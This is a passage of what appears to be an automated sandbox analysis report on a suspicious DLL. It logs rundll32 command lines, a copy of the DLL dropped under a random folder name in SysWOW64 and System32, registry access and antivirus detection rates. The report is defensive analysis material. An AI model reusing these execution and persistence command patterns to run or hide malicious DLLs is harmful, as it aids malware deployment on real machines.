                      Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E6A13F0 zwxnlwalmcbgmt
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6A13F0 zwxnlwalmcbgmt
                      Source: FIyE6huzxV.dll | Binary or memory string: OriginalFilenameErulfuaekg.dll6 vs FIyE6huzxV.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                      Source: FIyE6huzxV.dll | Virustotal: Detection: 19%
                      Source: FIyE6huzxV.dll | ReversingLabs: Detection: 22%
                      Source: FIyE6huzxV.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,abziuleoxsborpb
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,aejkroaebsbxdnkhb
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm",sRLFwndulUmgRNP
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Esbkudiqskvxrfyc\iscoyl.gsm",Control_RunDLL
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p